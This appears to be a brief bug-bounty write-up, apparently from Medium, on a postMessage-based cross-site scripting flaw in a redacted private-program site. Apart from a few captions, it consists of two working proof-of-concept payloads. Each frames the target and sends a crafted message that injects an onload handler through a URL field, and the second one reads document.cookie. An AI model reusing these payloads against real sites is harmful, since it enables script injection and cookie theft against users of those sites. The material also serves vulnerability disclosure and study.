PostMessage Xss vulnerability on private program

notification from postMessage tracker
postMessage script
creatFloatingPageElement function
getDataFromEvent function
<script>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var message = {"message":"e:openFloatingPage","data":{
"id":"1234gghq",
"name":"tayba",
"url":"https://www.framable.com\"+onload=alert()"
}};
IframeElement.contentWindow.postMessage(message, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/bootstrap.php" onload="SendMessage()"></iframe>
</script>
<script>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var message = {"message":"e:openFloatingPage","data":{
"id":"1234gghq",
"name":"tayba",
"url":"https://www.anything.com\"+onload=alert(document.cookie)"
}};
IframeElement.contentWindow.postMessage(message, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/download.php?p=jjjj" onload="SendMessage()"></iframe>
</script>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store